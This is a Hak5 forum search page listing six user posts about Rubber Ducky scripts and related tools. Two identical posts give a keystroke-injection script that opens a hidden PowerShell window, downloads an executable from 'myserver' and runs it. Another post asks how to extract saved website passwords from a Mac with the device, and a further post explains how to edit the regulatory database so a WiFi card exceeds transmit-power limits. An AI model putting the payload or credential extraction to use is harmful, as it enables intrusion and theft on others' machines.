Jump to content
Hak5 Forums

Search the Community

Showing results for tags 'script'.



More search options

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Talk
    • Everything Else
    • Gaming
    • Questions
    • Business and Enterprise IT
    • Security
    • Hacks & Mods
    • Applications & Coding
    • Trading Post
  • WiFi Pineapple
    • WiFi Pineapple TETRA
    • WiFi Pineapple NANO
    • WiFi Pineapple Mark V
    • WiFi Pineapple Mark IV
    • Pineapple Modules
    • WiFi Pineapple University
    • WiFi Pineapples Mark I, II, III
  • Hak5 Gear
    • Hak5 Cloud C²
    • Bash Bunny
    • Packet Squirrel
    • LAN Turtle
    • USB Rubber Ducky
  • Hak5 Shows
    • Hak5
    • HakTip
    • Metasploit Minute
    • Threatwire
  • Community
    • Forums and Wiki
    • #Hak5
  • Projects
    • SDR - Software Defined Radio
    • Community Projects
    • Interceptor
    • USB Hacks
    • USB Multipass
    • Pandora Timeshifting

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


AIM


MSN


Website URL


ICQ


Yahoo


Jabber


Skype


Location


Interests

Found 6 results

  1. Hey guys, my name is Patrick. Im new in the hacking world, im learning. I have a question, I'm trying to download and execute a payload in my rubber ducky but I can't. This is the script: DELAY 2000 GUI r DELAY 1000 STRING powershell -windowstyle hidden (new-object System.Net.WebClient).DownloadFile('http://myserver/file.exe','C:\file.exe');&'C:\file.exe' ENTER Can someone help me please.
  2. Patr

    Downoload Payload

    Hey guys, my name is Patrick. Im new in the hacking world, im learning. I have a question, I'm trying to download and execute a payload in my rubber ducky but I can't. This is the script: DELAY 2000 GUI r DELAY 1000 STRING powershell -windowstyle hidden (new-object System.Net.WebClient).DownloadFile('http://myserver/file.exe','C:\file.exe');&'C:\file.exe' ENTER Can someone help me please.
  3. Hi all, I'm a newbie to Hak5 Forums, so if this thread is in the wrong category, it would be great if the admins could move it to the correct category. Most of you are probably using 'BO' as the region for 'iw' on Linux. This allows the WiFi interface to operate at 30dBm (1 Watt) at max. However, if you're like me and have a device that is capable of transmitting over 1W (I have Alpha Network AWUS036NH - 2W), you might be interested in increasing the TX power beyond 30dBm. By default, selecting 'BO' as the region only allows the device to operate at a maximum of 30dBm. I tested this on my Raspberry Pi 3, Model B running Kali Linux (with the kali-linux-full metapackage). *** If you are lazy and don't want to follow these manual steps below, I made two bash scripts that will work on Kali Linux and Ubuntu : https://github.com/hiruna/wifi-txpower-unlocker Working directory: /root Steps: 1. Update and upgrade apt-get update apt-get upgrade 2. Install dependencies to compile apt-get install pkg-config libnl-3-dev libgcrypt11-dev libnl-genl-3-dev build-essential 3. Download the latest Central Regulatory Domain Agent (CRDA) and Wireless Regulatory Database I downloaded crda-3.18.tar.xz and wireless-regdb-2017.03.07.tar.xz wget https://www.kernel.org/pub/software/network/crda/crda-3.18.tar.xz wget https://www.kernel.org/pub/software/network/wireless-regdb/wireless-regdb-2017.03.07.tar.xz 4. Unzip the downloaded files tar xvJf crda-3.18.tar.xz tar xvJf wireless-regdb-2017.03.07.tar.xz 5. Navigate into wireless-regdb-2017.03.07 cd wireless-regdb-2017.03.07 6. Open db.txt and locate the region BO section nano db.txt You will see something like this: country BO: DFS-JP (2402 - 2482 @ 40), (30) (5250 - 5330 @ 80), (30), DFS (5735 - 5835 @ 80), (30) The number in the second set of brackets (for each frequency) is the txpower. Since I'm using the 2.4Ghz and want a txpower of 2W (~33dBm), I changed the 20 to 33, and saved the file: country BO: DFS-JP (2402 - 2482 @ 40), (33) (5250 - 5330 @ 80), (30), DFS (5735 - 5835 @ 80), (30) I also noticed that region AU allows 36dBm for 2.4Ghz, so you could just continue without modifying the region BO: country AU: DFS-ETSI (2400 - 2483.5 @ 40), (36) (5150 - 5250 @ 80), (23), NO-OUTDOOR, AUTO-BW (5250 - 5350 @ 80), (20), NO-OUTDOOR, AUTO-BW, DFS (5470 - 5600 @ 80), (27), DFS (5650 - 5730 @ 80), (27), DFS (5730 - 5850 @ 80), (36) (57000 - 66000 @ 2160), (43), NO-OUTDOOR However, I checked with Kali Linux (without compiling and changing the regulatory.bin) and it showed that max txpower was only 20dBm: country AU: DFS-ETSI (2402 - 2482 @ 40), (N/A, 20), (N/A) (5170 - 5250 @ 80), (N/A, 17), (N/A), AUTO-BW (5250 - 5330 @ 80), (N/A, 24), (0 ms), DFS, AUTO-BW (5490 - 5710 @ 160), (N/A, 24), (0 ms), DFS (5735 - 5835 @ 80), (N/A, 30), (N/A) So I'm assuming Kali Linux is using an old regulatory.bin and legislation in AU has changed. 7. Compile make 8. Backup up your old regulatory.bin file and move the new file into /lib/crda mv /lib/crda/regulatory.bin /lib/crda/regulatory.bin.old mv regulatory.bin /lib/crda As mentioned in https://wireless.wiki.kernel.org/en/developers/regulatory/crda and https://wireless.wiki.kernel.org/en/developers/regulatory/wireless-regdb, we need to include RSA public keys in crda-3.18/pubkeys. I noticed that there are already 2 .pem files in crda-3.18/pubkeys: sforshee.key.pub.pem linville.key.pub.pem 9. Copy root.key.pub.pem into crda-3.18/pubkeys. I also copied sforshee.key.pub.pem from wireless-regdb-2017.03.07 as it was newer: cp root.key.pub.pem ../crda-3.18/pubkeys/ cp sforshee.key.pub.pem ../crda-3.18/pubkeys/ I found that there are two other pubkeys located at /lib/crda : -rw-r--r-- 1 root root 451 Jan 18 12:58 benh@debian.org.key.pub.pem -rw-r--r-- 1 root root 451 Jan 18 12:58 linville.key.pub.pem -rw-r--r-- 1 root root 451 Jan 18 12:58 sforshee.key.pub.pem So I copied them too (wasn't too sure whether I needed to copy them): cp /lib/crda/pubkeys/benh\@debian.org.key.pub.pem ../crda-3.18/pubkeys/ cp /lib/crda/pubkeys/linville.key.pub.pem ../crda-3.18/pubkeys/ 10. Navigate into crda-3.18 and open the Makefile cd ../crda-3.18 nano Makefile In Kali Linux, crda is located at /lib/crda instead of /usr/bin/crda, so in the file change the 3rd line REG_BIN?=/usr/lib/crda/regulatory.bin to REG_BIN?=/lib/crda/regulatory.bin : REG_BIN?=/lib/crda/regulatory.bin 11. In the Makefile, find the line CFLAGS += -std=gnu99 -Wall -Werror -pedantic and remove the -Werror option (I couldn't compile without changing it as it treats warnings as errors): CFLAGS += -std=gnu99 -Wall -pedantic 12. Compile make clean make make install That's it! I rebooted my Raspberry Pi after compiling. reboot 13. Now let's change the region and set the txpower to 33dBm: ifconfig wlan1 down iw reg set BO iwconfig wlan1 txpower 33 ifconfig wlan1 up
  4. dot-iso

    duck_it.sh

    Hey there Hak5 community and fellow Rubber Ducky users! I'm a MacOS user and a beginner when it comes to coding, but I came up with a little bash script to help speed up the encoding process. It's nothing fancy. When I was writing a payload and having to encode then replace the file on the microSD and all that - it was getting a bit tedious. I call it duck_it. It basically takes your scripts as .txt files, encodes them, and transfers them to your microSD card and ejects the card. https://github.com/dot-iso/duck_it I'm new to Bash and GitHub, so there may be some n00b stuff. I'm sure there's a lot of room for improvement
  5. Hey, I ordered the beautiful USB rubber ducky and its working flawlessly. On windows its easy as copy-pasterino seeing how ducktoolkit is crazy good. I have one wish tho, and seeing how thats possible on windows, i dont see why it should be possible on mac. I want to be able to find a passord on a mac computer, on safari, chrome or firefox, does not matter. The password I am looking for is to a website. Also a quick question, I installed dropbox and my computer automatically logs in to the dropbox program, which is great. Just wondering where that password is saved..? Gonna be trying that on this device, and if it does not work ill try my look on the wifi pineapple nano, just got it today. :D Thank you guys!
  6. Hoi! So, I've decided to post a script that I've been using for many years. What it does is lock a folder with a specified password, allowing you to hide and unhide a folder from view any time you please. Keep in mind the code isn't entirely mine - it's an upgraded version of script I found on the internet many years ago. The method of hiding the folder can be seen through if the intruder suspects that there is something hidden there. If a hacker or pentester suspected that there was a hidden file they could find it fairly easily, and I'll tell you how later on in this post. However, if anyone else approached your computer and looked at the files they probably wouldn't look twice. I mean, would you? I don't, unless I suspect.. So, here's the code (why can't we have spoiler tags..): @echo off color 0a :LOAD cls if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto MAIN if NOT EXIST MyStuff goto MFOLDER goto MAIN :MAIN cls echo [ FolderLocker V3 ] echo. echo 1 - LOCK FOLDER echo 2 - UNLOCK FOLDER echo 3 - EXIT echo. set /p Choice=Choice: if %Choice% == 1 goto CONFIRMLOCK if %Choice% == 2 goto UNLOCK if %Choice% == 3 goto EXIT goto MAIN :LOCK ren "MyStuff" "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" echo Folder 'MyStuff' has been locked. timeout /t 1 >NUL goto MAIN :CONFIRMLOCK cls echo [ FolderLocker V3 ] echo. echo Lock Folder 'MyStuff'? (Y/N) set /p Choice=Choice: if %Choice% == Y goto LOCK if %Choice% == y goto LOCK if %Choice% == N goto MAIN if %Choice% == n goto MAIN echo Invalid choice. timeout /t 1 >NUL goto MAIN :UNLOCK cls echo [ FolderLocker V3 ] echo. echo Folder's Password: set /p Password=Password: if NOT %Password% == password goto EXIT ELSE attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" "MyStuff" echo Folder 'MyStuff' has been unlocked. timeout /t 1 >NUL goto MAIN :MFOLDER cls echo [ FolderLocker V3 ] echo. md MyStuff echo Folder 'MyStuff' has been created. timeout /t 1 >NUL goto MAIN :EXIT To change the password, just put your password in the :UNLOCK function, 6th line down from the line ":UNLOCK". You can also configure the commands so that it can unlock/lock a file in another directory, making it harder for a random person to know where the folder is, and greatly reduces the chances of someone suspecting a hidden folder (come on, a batch/exe file sitting there saying "FolderLockerV3" isn't going to spark some suspicion?). The folder to be locked is called 'MyStuff', to those who can't understand batch overly well. Anyway, as you may have deducted, the method of hiding the file is very simple. It adds the hidden tag on the file (obviously), but then makes Windows think it's a protected OS file (specifically, a Control Panel file). To view the file when it's hidden, you can click on the 'Options' button under 'View' in Windows Explorer and then click on 'Change folder and search options', then go to the 'View' tab, click on 'Show hidden files, folders and drives', scroll down a little more and then untick 'Hide protected operating system files'. Click on 'Apply' and 'Ok', then you should see the Control Panel folder with all it's contents. So you can see it's not overly secure but it's not obvious to those who don't know how it's secured. Now that I've told you it seems easy, right? If you didn't know you might be hard pressed to find out, assuming the owner of the folder converted the batch into an executable or something else that hides plain text. Anyway, enjoy and let me know if you have any other improvements or changes you want to (or are even going to) make to this code! I would love to know your ideas.
×